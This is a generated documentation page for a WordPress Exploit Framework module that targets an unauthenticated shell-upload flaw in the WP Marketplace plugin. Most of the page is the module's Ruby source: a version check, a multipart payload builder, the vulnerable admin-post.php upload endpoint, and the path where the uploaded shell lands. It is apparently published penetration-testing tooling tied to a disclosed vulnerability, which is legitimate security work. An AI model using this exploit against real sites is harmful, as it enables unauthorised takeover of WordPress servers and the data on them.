class Wpxf::Exploit::WpMarketplaceShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/wp_marketplace_shell_upload.rb, line 6 def initialize super update_info( name: 'WP Marketplace Unauthenticated Shell Upload', author: [ 'White Fir Design', # Discovery and disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8642'], ['URL', 'http://labs.sucuri.net/?note=2016-10-17'] ], date: 'Oct 14 2016' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/wp_marketplace_shell_upload.rb, line 23 def check check_plugin_version_from_readme('wpmarketplace') end
payload_body_builder()
click to toggle source
# File lib/wpxf/modules/exploit/shell/wp_marketplace_shell_upload.rb, line 31 def payload_body_builder builder = Utility::BodyBuilder.new builder.add_file_from_string('Filedata', payload.encoded, payload_name) builder end
uploaded_payload_location()
click to toggle source
# File lib/wpxf/modules/exploit/shell/wp_marketplace_shell_upload.rb, line 37 def uploaded_payload_location normalize_uri(wordpress_url_uploads, 'wpmp-previews', upload_result.body) end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/wp_marketplace_shell_upload.rb, line 27 def uploader_url normalize_uri(wordpress_url_admin, 'admin-post.php?task=wpmp_upload_previews') end